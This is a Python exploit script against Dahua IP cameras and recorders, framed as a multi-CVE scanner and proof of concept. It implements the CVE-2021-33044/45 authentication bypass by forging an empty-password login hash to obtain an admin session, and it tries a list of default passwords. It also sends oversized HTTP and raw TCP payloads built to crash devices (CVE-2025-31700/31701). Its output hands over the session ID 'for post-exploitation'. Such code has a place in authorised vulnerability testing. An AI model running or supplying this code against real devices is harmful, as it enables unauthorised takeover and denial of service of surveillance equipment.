#!/usr/bin/env python3 """ Dahua IP Camera - Multi-CVE Scanner & PoC CVE-2021-33044, CVE-2021-33045, CVE-2025-31700, CVE-2025-31701 Sources: NVD, Dahua Security Advisory DSA-2021-001 / DSA-2025-001 https://nvd.nist.gov/vuln/detail/CVE-2021-33044 https://nvd.nist.gov/vuln/detail/CVE-2025-31700 CVE-2021-33044 CVSS 9.8 CRITICAL CWE-287 (Improper Authentication) Auth bypass during RPC2 login via malicious data packet. Affects: IPC-HUM7xxx, IPC-HX3xxx, IPC-HX5xxx, TPC-*, VTO-*, VTH-* Firmware < 2.820.x.210705 (IPC) / < 2.630.x.210707 (TPC) CVE-2021-33045 CVSS 9.8 CRITICAL CWE-287 Same bypass. Widens scope to NVR-1/2/4/5/6xx & XVR-4x/5x/7x series Firmware < 4.001.x.210709 CVE-2025-31700 CVSS 8.1 HIGH CWE-120 (Buffer Overflow) Buffer overflow via specially crafted malicious packet. DoS (crash) guaranteed; RCE possible on devices without ASLR. Advisory: https://dahuasecurity.com/aboutUs/trustedCenter/details/775 CVE-2025-31701 CVSS 8.1 HIGH CWE-120 (Buffer Overflow) Same buffer overflow, different device set. Published: 2025-07-23 (no public PoC yet - DoS test included) """ import requests import hashlib import socket import struct import sys import argparse requests.packages.urllib3.disable_warnings() # --------------------------------------------------------------------------- # Shared helpers # --------------------------------------------------------------------------- def rpc2_challenge(target, port, timeout=8, http=None): """Get realm + random nonce + session from the camera's RPC2 login endpoint.""" try: r = (http or requests).post( f"http://{target}:{port}/RPC2_Login", json={"method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct", "authorityType": "Default", "passwordType": "Default"}, "id": 1, "session": 0}, timeout=timeout, verify=False) data = r.json() d = data.get("params", {}) return d.get("realm", ""), d.get("random", ""), data.get("session", 0) except Exception: return None, None, 0 def rpc2_login(target, port, user, pw_hash, session=0, timeout=8, http=None): """Submit an RPC2 login hash; returns the full JSON response dict.""" try: r = (http or requests).post( f"http://{target}:{port}/RPC2_Login", json={"method": "global.login", "params": {"userName": user, "password": pw_hash, "clientType": "Web3.0", "loginType": "Direct", "authorityType": "Default", "passwordType": "Default"}, "id": 2, "session": session}, timeout=timeout, verify=False) return r.json() except Exception as e: return {"error": str(e)} def bypass_hash(user, realm, random_str): """Crafted empty-password hash used in CVE-2021-33044/45 bypass.""" s1 = hashlib.md5(f"{user}:{realm}:".encode()).hexdigest().upper() s2 = hashlib.md5(f"{s1}:{random_str}:{s1}".encode()).hexdigest().upper() return s2 def legit_hash(user, pw, realm, random_str): """Correct hash for default-credential check.""" s1 = hashlib.md5(f"{user}:{realm}:{pw}".encode()).hexdigest().upper() s2 = hashlib.md5(f"{s1}:{random_str}:{s1}".encode()).hexdigest().upper() return s2 # --------------------------------------------------------------------------- # CVE-2021-33044 / CVE-2021-33045 -- Authentication Bypass (CVSS 9.8) # --------------------------------------------------------------------------- def test_auth_bypass(target, port=80, timeout=8): """ Attempt the empty-password RPC2 bypass. Vulnerable firmware accepts MD5(user:realm:) without any real password. Returns (vulnerable: bool, session_id: str) """ http = requests.Session() http.verify = False print("[*] CVE-2021-33044/45 -- RPC2 auth bypass") realm, rnd, sess = rpc2_challenge(target, port, timeout, http=http) if not realm: print(" [-] RPC2_Login not reachable") return False, None print(f" [+] Realm: '{realm}' Random: '{rnd}' Session: {sess}") bh = bypass_hash("admin", realm, rnd) resp = rpc2_login(target, port, "admin", bh, sess, timeout, http=http) if resp.get("result") is True: sid = resp.get("session", "") print(f" [!!!] VULNERABLE -- session: {sid}") return True, sid err = resp.get("error", {}) print(f" [-] Not vulnerable (patched) -- {err.get('code')}: {err.get('message')}") return False, None def test_default_creds(target, port=80, timeout=8): """Check common default passwords (useful regardless of CVE patch status).""" http = requests.Session() http.verify = False print("[*] Default credential check") realm, rnd, sess = rpc2_challenge(target, port, timeout, http=http) if not realm: print(" [-] RPC2_Login not reachable") return None for user, pw in [("admin", ""), ("admin", "admin"), ("admin", "888888"), ("admin", "666666"), ("admin", "123456"), ("666666", "666666"), ("888888", "888888")]: resp = rpc2_login(target, port, user, legit_hash(user, pw, realm, rnd), sess, timeout, http=http) if resp.get("result") is True: print(f" [+] Valid: {user}:{pw!r}") return user, pw, resp.get("session") print(" [-] No default credentials matched") return None # --------------------------------------------------------------------------- # CVE-2025-31700 / CVE-2025-31701 -- Buffer Overflow DoS (CVSS 8.1) # --------------------------------------------------------------------------- def _send_overflow_http(target, port, timeout=8): """ Send an oversized payload to the RPC2 HTTP parser. A vulnerable device may crash (DoS) or behave unexpectedly. """ oversized_value = "A" * 8192 # well beyond any sane field limit payload = { "method": "global.login", "params": { "userName": oversized_value, "password": oversized_value, "clientType": oversized_value, "authorityType": "Default", "passwordType": "Default" }, "id": 1 } try: r = requests.post( f"http://{target}:{port}/RPC2_Login", json=payload, timeout=timeout, verify=False) return r.status_code, len(r.content) except requests.exceptions.ConnectionError: return "CONNECTION_RESET", 0 except requests.exceptions.Timeout: return "TIMEOUT", 0 except Exception as e: return str(e), 0 def _send_overflow_tcp(target, tcp_port=37777, timeout=8): """ Send an oversized raw TCP packet to the Dahua binary protocol port (37777). Devices without ASLR may crash. """ try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) s.connect((target, tcp_port)) # Minimal Dahua binary frame header (magic 0xFF010000) + oversized body body = b"A" * 65535 header = struct.pack(">I", 0xFF010000) + struct.pack(">I", len(body)) s.sendall(header + body) try: resp = s.recv(1024) s.close() return "RESPONDED", len(resp) except socket.timeout: s.close() return "TIMEOUT_AFTER_SEND", 0 except ConnectionRefusedError: return "PORT_CLOSED", 0 except Exception as e: return str(e), 0 def test_buffer_overflow(target, port=80, timeout=8): """ CVE-2025-31700 / CVE-2025-31701 -- overflow probe. Sends over-length data to HTTP RPC2 and optional TCP/37777. A crash or connection reset may indicate the device is vulnerable. WARNING: This test may cause the device to crash (DoS). """ print("[*] CVE-2025-31700/01 -- Buffer overflow DoS probe") print(" [!] WARNING: may crash the target device") # HTTP overflow status, length = _send_overflow_http(target, port, timeout) print(f" HTTP response : status={status} len={length}") http_vuln = status in ("CONNECTION_RESET", "TIMEOUT") or ( isinstance(status, int) and status >= 500) # TCP overflow on port 37777 (Dahua binary protocol) tcp_status, tcp_len = _send_overflow_tcp(target, 37777, timeout) print(f" TCP/37777 : {tcp_status} len={tcp_len}") tcp_vuln = tcp_status in ("TIMEOUT_AFTER_SEND",) or ( isinstance(tcp_status, str) and "reset" in tcp_status.lower()) if http_vuln or tcp_vuln: print(" [!!!] Possible DoS -- device may have crashed (CVE-2025-31700/01)") return True else: print(" [-] No obvious crash response (may still be vulnerable -- check manually)") return False # --------------------------------------------------------------------------- # Main runner # --------------------------------------------------------------------------- CVE_MAP = { "2021-33044": lambda t, p, to: test_auth_bypass(t, p, to), "2021-33045": lambda t, p, to: test_auth_bypass(t, p, to), "2025-31700": lambda t, p, to: (test_buffer_overflow(t, p, to), None), "2025-31701": lambda t, p, to: (test_buffer_overflow(t, p, to), None), } def run_all(target, port, timeout): print(f""" ================================================== Dahua Multi-CVE Scanner CVE-2021-33044/45 | CVE-2025-31700/01 ================================================== Target : {target}:{port} """) bypass_ok, session = test_auth_bypass(target, port, timeout) print() default_ok = test_default_creds(target, port, timeout) print() bof_ok = test_buffer_overflow(target, port, timeout) print("\n" + "=" * 50) print("SUMMARY") print("=" * 50) print(f" CVE-2021-33044/45 auth bypass : {'VULNERABLE' if bypass_ok else 'Not Vulnerable (patched or unreachable)'}") print(f" Default credentials : {'FOUND' if default_ok else 'None matched'}") print(f" CVE-2025-31700/01 buffer ovfl : {'POSSIBLE' if bof_ok else 'No crash observed'}") if bypass_ok and session: print(f"\n [!!!] Session ID for post-exploitation: {session}") print(" Use dahua_auth_bypass.py --dump to enumerate device info.") def main(): parser = argparse.ArgumentParser( description="Dahua Multi-CVE Scanner", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" CVEs covered: 2021-33044 / 2021-33045 -- RPC2 auth bypass (CVSS 9.8) 2025-31700 / 2025-31701 -- Buffer overflow DoS (CVSS 8.1) Examples: python dahua_exploit.py 192.168.1.100 python dahua_exploit.py 192.168.1.100 -p 8080 python dahua_exploit.py 192.168.1.100 -c 2021-33044 """ ) parser.add_argument("target", help="Camera IP or hostname") parser.add_argument("-p", "--port", type=int, default=80, help="HTTP port (default: 80)") parser.add_argument("-c", "--cve", choices=list(CVE_MAP.keys()), help="Test a single CVE only") parser.add_argument("--timeout", type=int, default=8) args = parser.parse_args() if args.cve: CVE_MAP[args.cve](args.target, args.port, args.timeout) else: run_all(args.target, args.port, args.timeout) if __name__ == "__main__": main()